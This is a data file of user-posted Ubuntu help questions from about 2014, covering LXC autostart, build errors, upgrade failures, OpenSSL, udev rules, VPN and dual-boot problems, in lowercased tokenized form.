453659	lxc containers fail to autoboot in 14.04 trusty using 'lxc.start.auto = 1 '	in trusty 14.04 containers fail to autoboot despite all settings being set as 14.04 requires . they show all as stopped i have correctly configured 2 lxc containers : calypso encelado they run perfectly if i run sudo lxc-autostart then sudo lxc-ls -- fancy results in : ubuntu @ saturn : /etc/init $ sudo lxc-ls -- fancy name state ipv4 ipv6 autostart calypso running 192.168.1.161 - yes encelado running 192.168.1.162 - yes the problem is trying to run them at boot . i have at : /var/lib/lxc/calypso/config : # template used to create this container : /usr/share/lxc/templates/lxc-download # parameters passed to the template : # for additional config options , please look at lxc.conf ( 5 ) # distribution configuration lxc.include = /usr/share/lxc/config/ubuntu.common.conf lxc.arch = x86_64 # container specific configuration lxc.rootfs = /var/lib/lxc/calypso/rootfs lxc.utsname = calypso # network configuration lxc.network.type = veth lxc.network.flags = up # lxc.network.link = lxcbr0 lxc.network.link = br0 lxc.network.hwaddr = 00:16:3e:64:0b:6e # assegnazione ip address lxc.network.ipv4 = 192.168.1.161/24 lxc.network.ipv4.gateway = 192.168.1.1 # autostart lxc.start.auto = 1 lxc.start.delay = 5 lxc.start.order = 100 and i have lxc_auto= '' false '' as required inside /etc/default/lxc : lxc_auto= '' false '' use_lxc_bridge= '' false '' # overridden in lxc-net [ -f /etc/default/lxc-net ] & & . /etc/default/lxc-net lxc_shutdown_timeout=120 any idea on why the containers do n't start at boot ? at reboot they are always in the stopped state : ubuntu @ saturn : ~ $ sudo lxc-ls -- fancy name state ipv4 ipv6 autostart calypso stopped - - yes encelado stopped - - yes and then again they can be started manually , using sudo lxc-autostart
453660	warning : 'automake-1.11 ' is probably too old	i am trying to install a package . when doing make command , i got an error as : make [ 5 ] : entering directory `/mirror/myprogram-environment/myprogram-1.1.92/utils_lgpl/myvendor_common/packages/myvendor_common/src' cd ../../../../.. & & /bin/bash /mirror/myprogram-environment/myprogram-1.1.92/config/missing -- run automake-1.11 -- foreign utils_lgpl/myvendor_common/packages/myvendor_common/src/makefile configure.ac:16 : version mismatch . this is automake 1.11.3 , configure.ac:16 : but the definition used by this am_init_automake configure.ac:16 : comes from automake 1.11.1 . you should recreate configure.ac:16 : aclocal.m4 with aclocal and run automake again . warning : 'automake-1.11 ' is probably too old . you should only need it if you modified 'makefile.am ' or 'configure.ac ' or m4 files included by 'configure.ac ' . as an information , i configure a program with this command : netcdf_fortran_cflags=-i $ { netcdfroot } /include \ netcdf_fortran_libs= '' -l $ { netcdfroot } /lib -lnetcdf -lnetcdff '' \ pkg_config_path= $ { netcdfroot } /lib/pkgconfig \ ./configure -- prefix= $ myprogramroot -- with-mpi -- with-petsc= $ petsc_dir this question is almost similar with : babl : recreate aclocal.m4 with macros from libtool 2.4 however , i still need more explanation for this specific case . ( i tried to use autoreconf -i but there was still error said that there is no option for that )
453661	14.04 upgrade problem , 3.8.0-31 generic works but not 3.11.0.14 ; should i do a fresh install ?	original system 13.10 64bit , dual boot with windows , 3 x hard drives , nvidia graphic driver installed ; /home on separate disc from root . all working fine . allowed upgrade to 14.04 , error on restart `` error : symbol 'grub_term_highlight_color ' not found . '' as reported by many others . ran boot-repair from disc , got grub screen back , but boot into ubuntu fails after initial screen . possible to boot into windows . rebooting and going into `` advanced options for ubuntu '' and choosing recovery mode works but is very slow . rebooting into `` ubuntu 3.8.0-31 generic '' works , but is not very stable . if i try to run from the 14.04 live dvd , it hangs with blank screen after choosing `` run without installing '' . the same happens if i try to run from a usb stick made from a separate torrent download of 14.04 . have now tried xubuntu 14.04 live dvd with the same results i can run older distros from live cds and 14.04 disc works on another machine . i have not yet tried a fresh install and am wary of that because of my /home on a separate drive . any suggestions on what to do next ?
453663	filesystem check during installation takes long time	filesystem check , as i install ubuntu 14.04 , took 9 hours and the installation did n't continue . how can i fix it ? tried to install it with windows but on different partition .
453664	how to install tata photon+ zte ac2787 in ubuntu 12.10 ?	$ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04f2 : b249 chicony electronics co. , ltd bus 001 device 005 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 002 device 012 : id 19d2 : fff1 zte wcdma technologies msm
453666	recover old files in 14.04	i recently made a mistake of upgrading to lts 14.04 , only to find out that my athlon le1660 and 2gb ram was not able to support this os . so i made bootable copy of ubuntu 13.04 on an flash drive and reinstall 13.04 and also to try and recover some files but i don ; t know how to do this as i no longer can access my old file in 14.04 . when i try to boot up using 14.04 it just freezes each time . when i try to access the the files from 13.04 it gives me an error message saying i do n't have the proper permissions .
453667	ruby openssl vs linux openssl	i have a difficulty reconciling ruby 's openssl library with the standard linux command line openssl . what i 'm trying to do here is encrypt the string mysecretstring with the password foobar but first hashing the password using sha256 ( mimicking the code in the aescrypt gem ) . here is what i do in irb : 2.0.0-p353 :041 > aes = openssl : :cipher : :cipher.new ( `` aes-256-cbc '' ) = > # < openssl : :cipher : :cipher:0x000000026b8d50 > 2.0.0-p353 :042 > aes.encrypt = > # < openssl : :cipher : :cipher:0x000000026b8d50 > 2.0.0-p353 :043 > aes.key=openssl : :digest : :sha256.new ( 'foobar ' ) .digest = > `` \xc3\xab\x8f\xf17 \xe8\xad\x90g\xdd9fk < \x89t\xe5\x92\xc2\xfa8=j9`ql\xae\xf0\xc4\xf2 '' 2.0.0-p353 :044 > base64.encode64 ( aes.update ( 'mysecretstring ' ) +aes.final ) = > `` 305v0kbklj/hobsk4ferha==\n '' 2.0.0-p353 :045 > so far so good . now i want to see how this matches what i can do with openssl directly in the linux command line . [ ( master ) ] $ echo -n `` foobar '' | openssl dgst -sha256 -c ( stdin ) = c3 : ab:8f : f1:37:20 : e8 : ad:90:47 : dd:39:46:6b:3c:89:74 : e5:92 : c2 : fa:38:3d:4a:39:60:71:4c : ae : f0 : c4 : f2 [ ( master ) ] $ echo -n `` mysecretstring '' | openssl enc -e -aes-256-cbc -a enter aes-256-cbc encryption password : verifying - enter aes-256-cbc encryption password : u2fsdgvkx18eoctrtmnqucrnstue6oy9b5rlutofcno= [ ( master ) ] $ where in the last two steps i pasted the string c3 : ab:8f : f1:37:20 : e8 : ad:90:47 : dd:39:46:6b:3c:89:74 : e5:92 : c2 : fa:38:3d:4a:39:60:71:4c : ae : f0 : c4 : f2 that i got by hashing the password 'foobar ' in the first step . why am i not getting the same answer , and more importantly , what do i need to do in the linux cmd to mimic what i get from ruby ?
453668	custom keyboard shortucts not working on fresh 14.04 install	after a fresh install of 14.04 , i tried to customize the keyboard shortcuts to be similar to the customized ones i used before in 12.10 like super+eject = lock screen ( macbook keyboard ) . unfortunately , any change i do do n't stick even after reboot or if i change it back to defaults . weird thing is that even if my super+eject does n't lock the screen the not-mentioned super+l shortcut still locks the screen . edit : i have a feeling that it has something to do with how unity handles keyboard shortcuts now . the moment i install gnome-panel ( because i prefer the gnome2 desktop ) , all the shortcuts i 've set work now except that some items for keyboard shortcuts through system settings are missing ( but are available again once i switch back to unity . they stop working in unity again , though )
453670	error 255 when installing openssl from source	i need to build openssl from source because it 's needed to build a mysql driver for android for qt but when i do `` make install '' i get the following error : cms.pod around line 457 : expected text after =item , not a number cms.pod around line 461 : expected text after =item , not a number cms.pod around line 465 : expected text after =item , not a number cms.pod around line 470 : expected text after =item , not a number cms.pod around line 474 : expected text after =item , not a number pod document had syntax errors at /usr/bin/pod2man line 71. make : *** [ install_docs ] error 255 any help ? i am using ubuntu 14.04 ( clean install ) . here is the tutorial i am using : link the build was done using : ranlib= '' $ br '' ranlib cc= '' $ br '' gcc ./configure android-armv7 -- prefix= $ sr/usr android_dev= $ sr/usr make make install
453673	ubuntu 14.04 upgrade error	i keep getting this messages : w : failed to fetch gzip : /var/lib/apt/lists/partial/ph.archive.ubuntu.com_ubuntu_dists_trusty_multiverse_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/ph.archive.ubuntu.com_ubuntu_dists_trusty_universe_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead .
453678	window management in ubuntu 12.04 does n't work anymore	i need some help about the window management in ubuntu 12.04 . when i drag a window to a side of my screen , the window does n't fit to the half screen , like it was before . does anyone have this problem ? thanks !
453680	wallch not changing wallpaper after upgrade to 14.04	wallch was working fine for me ( not counting this - wallch changing frequency resets automatically ) on 13.10 . after 14.04 upgrade , i have the new indicator on top , but no option to either select the wallpapers/folders to select random wallpapers from , nor does it automatically change after the set interval like it used to . anyone else in the same soup , and with a solution ?
453681	gcc wo n't link with -m32	trying to compile even the simplest ( int main ( ) { } ) program with -m32 on a 64-bit system fails : $ gcc -m32 test.c /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.8/libgcc.a when searching for -lgcc /usr/bin/ld : can not find -lgcc /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.8/libgcc_s.so when searching for -lgcc_s /usr/bin/ld : can not find -lgcc_s collect2 : error : ld returned 1 exit status it seems to be still erroneously searching in the wrong directories when -m32 is specified . libgcc-4.8-dev : i386 is installed and i 've verified that the 32-bit libraries are located in /usr/lib/gcc/i686-linux-gnu/4.8/ . i 've tried setting and exporting ld_include_path and ld_library_path to no avail .
453682	preseed file whith ufw command do not work	in trusty the command ufw ufw/enable boolean true works very well , but the ufw ufw/allow_known_ports multiselect ssh do not work . why ?
453684	install ubuntu over network	i want to install ubuntu 14 on an old pc i have . it does n't seem to boot from a cd or usb . i want to not have to setup a lot of software to get this to work . the pc is connected to my local network . is there any way i can do this from windows ?
453685	auto-boot to cli in ubuntu server and auto login to gui	i know that this question is likely to have been asked elsewhere , but despite a concerted effort i have found everything but what i am looking for . what i want to do is pretty straightforward . i have a server running on 14.04 server lts . some software that i want to run on in it necessitates a gui , but other benefits from the cli . what i want to be able to do is administer it remotely , and for it to boot into cli but with one command switch to a gui . from there i would be able to return to the cli when i had finished . so : boot to cli switch to gui at will switch back to cli , also at will ... ... so that i could view what was going on from a remote desktop while my server was running a gui . any help would not only be much appreciated , but the giver would be held in the highest regard : o ) david c
453689	mouse not working after installing 14.04 lts 64bit	after new install ubuntu 14.04 after login screen mouse becomes disabled . mouse worked just fine up until after login screen . how can mouse issue be corrected ?
453695	ubuntu 14.04 git install problem	after sudo apt-get install git : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : git : depends : liberror-perl but it is not installable e : unable to correct problems , you have held broken packages . after sudo apt-get install liberror-perl : package liberror-perl is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'liberror-perl ' has no installation candidate
453696	vpn connection eap auth error	i am having issues to configure my connection . i have found several tips on setting up 'refuse-eap ' . this is my log : $ sudo pon myvpn nodetach using interface ppp0 connect : ppp0 < -- > /dev/pts/11 < br/ > eap required to authenticate us but no suitable secrets connection terminated . and this is my /etc/networkmanager/system-connections/vpn\ connection\ 1 file : [ connection ] id=myvpn uuid=4f616063-bd08-45d6-acf1-74b8a361725f type=vpn autoconnect=false [ vpn ] service-type=org.freedesktop.networkmanager.pptp gateway=changed-gateway require-mppe=yes user=xxxx refuse-chap=yes refuse-eap=yes password-flags=3 refuse-pap=yes [ ipv4 ] method=auto never-default=true note that 'refuse-eap ' option is set . any ideas ?
453697	how can i have flash newer than 11.2 ?	a site with online games ask at least 11.8 and i do n't know how can i update to this version . is there a way for firefox ?
453698	missing : `` /usr/include/python3.3m/python.h ''	i recently moved to ubuntu 14.04 . i ca n't compile blender afterwards . it says the error message below cmake error at cmakelists.txt:2220 ( message ) : missing : `` /usr/include/python3.3m/python.h '' , set the cache entry 'python_include_dir ' to point to a valid python include path . containing python.h for python version `` 3.3 '' i went to see the /usr/include/ directory , and i only have these python-related folders : 2.7 , 3.4 and 3.4m but no 3.3 or 3.3m i tried to install the python3.3 but got this message via apt-get : package python3.3 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : python3.3-minimal libpython3.3-minimal libpython3.3 e : package 'python3.3 ' has no installation candidate i went on to try installing the packages listed , and it wo n't let me . before my upgrade , compiling blender worked and did n't complain of anything . how can i get the 3.3 back ?
453703	ca n't connect to 802.1x eap network in recent ubuntu versions	in my college there 's a wifi network using 802.1x peap . in ubuntu 12.10 and older , i can sucessfully connect to it , but in ubuntu 13.04 , 13.10 and 14.04 , it keeps asking for password and never connect . at first i thought it was a problem with my ralink rt5390 wifi card as it does n't have good open-source support and other friend were having trouble connecting to the same network with ralink cards . so i got an atheros ar5b22 and it solved a lot of small isues i was getting ( including connecting to this netowrk ) , but i 'm stuck in ubuntu 12.10 because of this . is there something i can do to get that network working in current versions , like 14.04 or it 's a know bug ? i 'm not sure what kind of technical info you guys need , so , just ask me if necessary ...
453706	disable quickboot ? dual boot 14.01 with win8 on dell inspirion laptop	i have an new dell inspiron 7000 laptop with an existing version of win8 installed . am trying to install 14.04 on it maintaining the current installation of win8 as a dual boot . the ubuntu uefi wiki tells me to : in your bios , disable quickboot/fastboot and intel smart response technology ( srt ) . if you have windows8 , also disable faststartup . i have disabled both the srt ( in bios ) and faststartup ( in win8 ) . however i can not find an option to disable the quickboot/fastboot in the dell bios . so it goes straight into win8 whenever i restart the laptop with the 14.04 dvd . no option to install 14.04 is presented . most frustrating ... alternatively , will disabling secureboot in the bios get around the problem ? the uefi wiki talks about this further on . can someone please advise before i pull all my hair out ! thanks , cheers andy
453708	newbe : dont understand description how to sync firefox	want to sync firefox on two computers , both with identical ubuntu firefox . the official descrption is confusing me . i never know , which one is the `` other '' computer . where can i find a step by step introduction ?
453709	global keyboard shortcuts broken in 14.04	i 've just upgraded my distribution from 13.10 to 14.04 , which seems to have broken global keyboard shortcuts . they are still present in the `` keyboard settings '' as before . although media keys are affected , so are other global shortcuts like ctrl+alt+t for terminal . other keyboard shortcuts work at an application level still , however . i am also currently using gnome shell as my desktop environment , although the alt+f2 shortcut for shell commands still seems to work . does anyone know of how this could have been caused ?
453711	ubuntu trusty tahr runs slowly in virtualbox , with 3d enabled	i installed the latest ubuntu in the latest virtualbox . it is slow : frames are visible in animations and the mouse flickers . this question is different from many others on the net that suggest enabling 3d support . `` /usr/lib/nux/unity_support_test -p '' returns that unity 3d is supported . everything seems as it is supposed to be . in virtualbox 3d acceleration is enabled , 2d acceleration is greyed out ( absent ) . i gave it 64mb of video ram . this is on an i5 with hd graphics 2500 , on w8.1+update plus latest hd drivers . nothing uncommon : this should be in the ubuntu release notes .
453714	connect to sftp/ssh via nautilus during a vnc session	im having an issues where i can not connect to an sftp/ssh server via nautilus/files during a vnc session . when i am standing at the terminal it works just fine ! but over vnc i get an error stating `` this file server type is not recognized . '' see here . but it also works if i use x11vnc and connect to display :0 , but will not work on any other vnc server ( tigervnc , vnc4server ) . steps to recreate the problem : 1. install fresh ubuntu 14.04 desktop 2. setup and connect via vnc 3. try to connect to sftp/ssh via ubuntu files/nautilus how do i fix this ?
453715	any patches available for ubuntu 14.04 ?	i have tested ubuntu 14.04 and xubuntu 14.04 and in both cases i had issues with installing the latest nvidia driver from nvidia.com and also with being able to perform a scheduled shutdown using a gui shutdown timer or from the command line/terminal with sudo shutdown -h ... .. i also used software like qshutdown and easyshutdown but with no success so far . i know there is a solution for installing upstream drivers directly from amd 's website on this page but there is nothing similar for nvidia . i ca n't just use nvidia-173 ubuntu driver because it comes with the wrong version for nvidia-settings , namely nvidia-settings version 304 or version 331 . ca n't adjust resolution , monitor frequency or use power mizer unless i try this unusual solution . this goes for ubuntu 12.04 as well as for ubuntu 13.10 but at least with those releases i was able to install the latest video driver from nvidia.com . i noticed that nvidia-173 driver package present in ubuntu 14.04 repositories can be activated only because it uses a patch to match ubuntu 14.04 most famous kernel , and i was wondering if there are more patches like this one available out there to allow me to install the same software i used successfully in ubuntu 12.04 or ubuntu 13.10 including my video drivers from nvidia.com . and i need to be able to schedule a complete shutdown ( using the terminal emulator or some application like easyshutdown or qshutdown ) without having to install kde shutdown utilities and a lot of other packages needed to run kde applications . shutdown works only after installing these kde extra packages in xubuntu 14.04 .
453716	enable wireless wg511 card dell 8200 in ubuntu 14.04	how to enable net gear ? 54mbps , wg511 v2 wireless card . ubuntu 14.04 not installing tried rebooting updated with wired connection , and updated again . still nothing .
453717	i need downgrade from subversion 1.8 to subversion 1.7	i 've upgraded system from 13.10 to 14.04 lts now i need downgrade from subversion 1.8 to subversion 1.7 , because formats 1.7 vs 1.8 are different and i can not access to svn repo of my team . i 've failed to compile svn from sources : a lot of dependencies , strange errors . i can not understand why svn has not been packed into standalone deb package . i 'm sure there are a lot of people that need precisely one svn version and do not need forced svn upgrade . so , my question is : how can i switch to svn 1.7 from 1.8 , staying at ubuntu 14.04 ? update i 've installed svn 1.7.9 on ubuntu 14.04 from source . then i 've installed svn 1.7.9 on ubuntu 14.04 as described below via apt-get and source.list manipulations both cases resulted with message : the following repository access ( ra ) modules are available : ra_svn : module for accessing a repository using the svn network protocol . handles 'svn ' scheme ra_local : module for accessing a repository on local disk . handles 'file ' scheme this message means that i can not access svn repository of my team , because http/https support is not installed . update2 i hate subversion and ubuntu . the second day i spend trying to compile subversion 1.7 on ubuntu 14.04 with http/https support . no result . i do not understand , why formats 1.7 and 1.8 of subversion uncompatible . i hate subversion developers . i do not understand , why the http/https support is absent in https : //launchpad.net/ubuntu/trusty/amd64/subversion/1.7.14-1ubuntu2 https : //launchpad.net/ubuntu/trusty/amd64/libsvn1/1.7.14-1ubuntu2 is it too difficult to give me only one deb package , that i can install and forget about configuration ? i thought it 'd take me for maximum 10 minutes : sudo apt-get install svn-1.7 but i spend my time configuring neon and serf and trying to fit for conditions of that i do n't what .
453719	dpkg does n't function properly after upgrading an aws ec2 to 14.04	after running do-release-upgrade -d on our staging ec2 instance , i 've encountered a problem with dpkg . my original problem was that mkvirtualenv command was failing with the following error : unknown distribution virtual 1.7.11 and some details i can not recover , because i 've erased python : ( but once i 've removed python manually , and tried to re-install it , i started getting the following error at the rnd of the apt-get install process : setting up python-twisted-names ( 11.1.0-1 ) ... /var/lib/dpkg/info/python-twisted-names.postinst : 8 : /var/lib/dpkg/info/python-twisted-names.postinst : pycompile : not found dpkg : error processing package python-twisted-names ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up python-twisted-web ( 11.1.0-1 ) ... /var/lib/dpkg/info/python-twisted-web.postinst : 8 : /var/lib/dpkg/info/python-twisted-web.postinst : pycompile : not found dpkg : error processing package python-twisted-web ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : python-twisted-names python-twisted-web e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help is much appreciated .
453720	14.04 and ati hd 4890	i 'm running ubuntu 12.04 lts with fglrx 8.960 . i 've locked this version because updates wo n't enable 3d acceleration , i.e . unity would switch to 2d mode and my steam games wo n't launch . afaik , amd has declared this card `` legacy '' -- i was wondering if i can upgrade to 14.04 and have proprietary fglrx driver for my card and how or if i have to stay with 12.04 .
453721	losing traffic through linux server	i am running ubuntu 12.04.4 server and trying to use it as internet server . unfortunately i keep losing wesites to view through my server , but when i connect directly to my adsl modem , there is no problem ! ! ! ! ! ! ! the machine has two network interfaces 200.1.1.1 on eth0 and 192.168.1.26 on eth1 default gateway is connected to eth1 as 192.168.1.1 ( adsl modem ) my laptop is connected to eth0 as 200.1.1.10 and the default gateway of laptop set to 200.1.1.1 there is no problem surfing google , but i cant open most other website such as askubuntu.com or w3schools.com by the way , i can ping all websites addresses and ip 's . this problem driving me crazy for a month . thanks for your attention .
453724	ca n't get into recovery mode using shift key ... alternatives ?	ubuntu 13.04 via parallels 9 . fresh install yesterday . this morning ubuntu tried auto-update and now gnome wo n't work ... black screen ... but if you blindly click around and find the terminal , it will accept and run commands , but you can not actually see anything . so of course i thought i 'd try booting into recovery mode . but i ca n't pull up the grub menu by holding shift like i am used to doing on a stand-alone ubuntu machine . parallels must somehow be getting in the way of the keyboard functionality at the right moment . are there any other ways to get the system to pull up the grub menu upon restart ? is there a simple terminal command that i can enter ( keeping in mind that i can enter commands , but i can not see anything ) ... seems to me there ought to be a variable stashed away somewhere to handle this . neither shift key works for awakening grub ... tried holding , multiple presses , etc . thanks ! !
453728	libreoffice base not opening in 14.04	just tried to open up base database under libreoffice suite by to my surprise nothing happens . all the other programs ( writer , calc , impress , math ) open and work accordingly . how can i rectify this problem ? thanks in advance .
453734	is it posible to upgrade to ubuntu 14.04 from ubuntu 10.04 ?	i have 2 pcs ( works as a lamp servers ) with 10.04.4 lts 12.04.2 lts and i want to upgrade to the last lts ( 14.04 ) . i do n't want to lose my data ( unfortunately i do n't have space to copy the information ) can i upgrade the version without lost my lamp data ?
453738	what do when asked to choose a launch application please ?	normally i use the ubuntu software centre link from the unity , or dash to find the software i want - since the installation is practically automatic . but i occasionally search for it on google . the following exemplifies the problem created thus : https : //apps.ubuntu.com/cat/applications/master-pdf-editor/ with this link being part of the ubuntu woodwork , i was expecting similar installation integration - especially as it says `` available at the software centre '' . instead , i get a dialogue box asking me for the launch application . while guessing that it might be something to do with unity , i have no idea where to find the application in my file system . ( i should add that i have not greatly changed the file system since i installed ubuntu . ) a few quick pointers here ( please ! ) could help . in the meantime , i will persist in trying to find the answer myself . i have n't yet developed an intuition about where stuff can be found in ubuntu .
453744	udev rule not working	i can not figure out why this rule wont fire : action== '' add '' , kernel== '' sdb '' , subsystems== '' scsi '' , attrs { model } == '' elements 1048* '' , run+= '' /usr/bin/mysync.sh '' here is the additional info looking at device '/devices/pci0000:00/0000:00:1d.7/usb1/1-1/1-1:1.0/host5/target5:0:0/5:0:0:0/block/sdb ' : kernel== '' sdb '' subsystem== '' block '' driver== '' '' attr { ro } == '' 0 '' attr { size } == '' 976769024 '' attr { stat } == '' 2424 116950 120088 5572 1 0 1 388 0 3152 5940 '' attr { range } == '' 16 '' attr { discard_alignment } == '' 0 '' attr { events } == '' '' attr { ext_range } == '' 256 '' attr { events_poll_msecs } == '' -1 '' attr { alignment_offset } == '' 0 '' attr { inflight } == '' 0 0 '' attr { removable } == '' 0 '' attr { capability } == '' 50 '' attr { events_async } == '' '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1/1-1/1-1:1.0/host5/target5:0:0/5:0:0:0 ' : kernels== '' 5:0:0:0 '' subsystems== '' scsi '' drivers== '' sd '' attrs { rev } == '' 1022 '' attrs { type } == '' 0 '' attrs { scsi_level } == '' 7 '' attrs { model } == '' elements 1048 `` attrs { state } == '' running '' attrs { queue_type } == '' none '' attrs { iodone_cnt } == '' 0x9a8 '' attrs { iorequest_cnt } == '' 0x9a8 '' attrs { device_busy } == '' 0 '' attrs { evt_capacity_change_reported } == '' 0 '' attrs { timeout } == '' 30 '' attrs { evt_media_change } == '' 0 '' attrs { max_sectors } == '' 240 '' attrs { ioerr_cnt } == '' 0x13 '' attrs { queue_depth } == '' 1 '' attrs { vendor } == '' wd `` attrs { evt_soft_threshold_reached } == '' 0 '' attrs { device_blocked } == '' 0 '' attrs { evt_mode_parameter_change_reported } == '' 0 '' attrs { evt_lun_change_reported } == '' 0 '' attrs { evt_inquiry_change_reported } == '' 0 '' attrs { iocounterbits } == '' 32 '' attrs { eh_timeout } == '' 10 '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1/1-1/1-1:1.0/host5/target5:0:0 ' : kernels== '' target5:0:0 '' subsystems== '' scsi '' drivers== '' '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1/1-1/1-1:1.0/host5 ' : kernels== '' host5 '' subsystems== '' scsi '' drivers== '' '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1/1-1/1-1:1.0 ' : kernels== '' 1-1:1.0 '' subsystems== '' usb '' drivers== '' usb-storage '' attrs { binterfaceclass } == '' 08 '' attrs { binterfacesubclass } == '' 06 '' attrs { binterfaceprotocol } == '' 50 '' attrs { bnumendpoints } == '' 02 '' attrs { supports_autosuspend } == '' 1 '' attrs { balternatesetting } == '' 0 '' attrs { binterfacenumber } == '' 00 '' attrs { interface } == '' msc bulk-only transport '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1/1-1 ' : kernels== '' 1-1 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { devpath } == '' 1 '' attrs { idvendor } == '' 1058 '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 4 '' attrs { configuration } == '' usb mass storage '' attrs { bmaxpower } == '' 500ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' 80 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 0 '' attrs { bcddevice } == '' 1022 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { serial } == '' 575856314535334e5a533833 '' attrs { version } == '' 2.10 '' attrs { urbnum } == '' 7511 '' attrs { ltm_capable } == '' no '' attrs { manufacturer } == '' western digital '' attrs { removable } == '' unknown '' attrs { idproduct } == '' 1048 '' attrs { bdeviceclass } == '' 00 '' attrs { product } == '' elements 1048 '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1 ' : kernels== '' usb1 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { devpath } == '' 0 '' attrs { idvendor } == '' 1d6b '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { authorized_default } == '' 1 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 1 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 0ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 8 '' attrs { bcddevice } == '' 0313 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { serial } == '' 0000:00:1d.7 '' attrs { version } == '' 2.00 '' attrs { urbnum } == '' 96 '' attrs { ltm_capable } == '' no '' attrs { manufacturer } == '' linux 3.13.0-24-generic ehci_hcd '' attrs { removable } == '' unknown '' attrs { idproduct } == '' 0002 '' attrs { bdeviceclass } == '' 09 '' attrs { product } == '' ehci host controller '' looking at parent device '/devices/pci0000:00/0000:00:1d.7 ' : kernels== '' 0000:00:1d.7 '' subsystems== '' pci '' drivers== '' ehci-pci '' attrs { irq } == '' 22 '' attrs { subsystem_vendor } == '' 0x1025 '' attrs { broken_parity_status } == '' 0 '' attrs { class } == '' 0x0c0320 '' attrs { companion } == '' '' attrs { enabled } == '' 1 '' attrs { consistent_dma_mask_bits } == '' 32 '' attrs { dma_mask_bits } == '' 32 '' attrs { local_cpus } == '' ff '' attrs { device } == '' 0x27cc '' attrs { uframe_periodic_max } == '' 100 '' attrs { msi_bus } == '' '' attrs { local_cpulist } == '' 0-7 '' attrs { vendor } == '' 0x8086 '' attrs { subsystem_device } == '' 0x0349 '' attrs { d3cold_allowed } == '' 1 '' looking at parent device '/devices/pci0000:00 ' : kernels== '' pci0000:00 '' subsystems== '' '' drivers== '' ''
453745	ubuntu|windows dual boot on i3 powered tablet ?	after i started using ubuntu on my laptop some month ago , i 'd love to use it on my tabled too . however , because of different reasons , i ca n't just trash the windows on my tablet . so my question is : is it actually possible to make a dual boot on my tablet ? it has an 1.5 ghz i3 dual core ( amd64 ) , so it should n't be a problem to use ubuntu . but i only have a blue-tooth keyboard available , so my biggest concern is weather i can actually input anything when grub loader pops up .
453748	removed current running linux-image	i had the problem of a full /boot . so i decided to remove old linux-images . however in the process i accidentally removed the current in-use image . which would be linux-image-3.2.0-53-generic on ubuntu 12.04 . trying a apt-get -f install results in : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.54.64 ) ; however : version of linux-image-server on system is 3.2.0.60.71. linux-server depends on linux-headers-server ( = 3.2.0.54.64 ) ; however : version of linux-headers-server on system is 3.2.0.60.71. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-server however i did n't apt-get remove linux-image-server because i 'm not sure what will happen . what would be a way to make a package of the current running image so the machine can be rebooted again ?
453749	how can i get involved in the ubuntu ayatana team ?	how can i get involved in ubuntu ux team ? i think that ubuntu is the most one of the linux distros in the world . especially , i am interested in mir , unity project to make ubuntu ux . i am not experienced but i 'd like to ubuntu graphics .
453751	accidentally removed windows when dual booting ( ubuntu re-install wiped partitions )	i am not sure if this question is appropriate to be posted here but i have really no idea and i really need to fix this problem asap and i am so frustrated right now . i was dual booting windows 8.1 with ubuntu and after a successful installation in which both oses boot fine , i installed gnome on ubuntu and i could not get ubuntu booting again , so i decided to reinstall ubuntu but i did n't know that the reinstall and wipe data option will remove the windows drive . now i am left with ubuntu but i still need windows as my primary os , i have backup up a system image of windows 8.1 and my question is how to restore from that , loosing ubuntu is n't an issue , any ideas would be greatly appreciated
453756	terminal lockup	my terminal looks ok , takes the first line of text but will not except any text after the enter key is pressed , it asks for password but , the prompt remains static as i try to input my password and only responds to the enter command by asking again for the password .
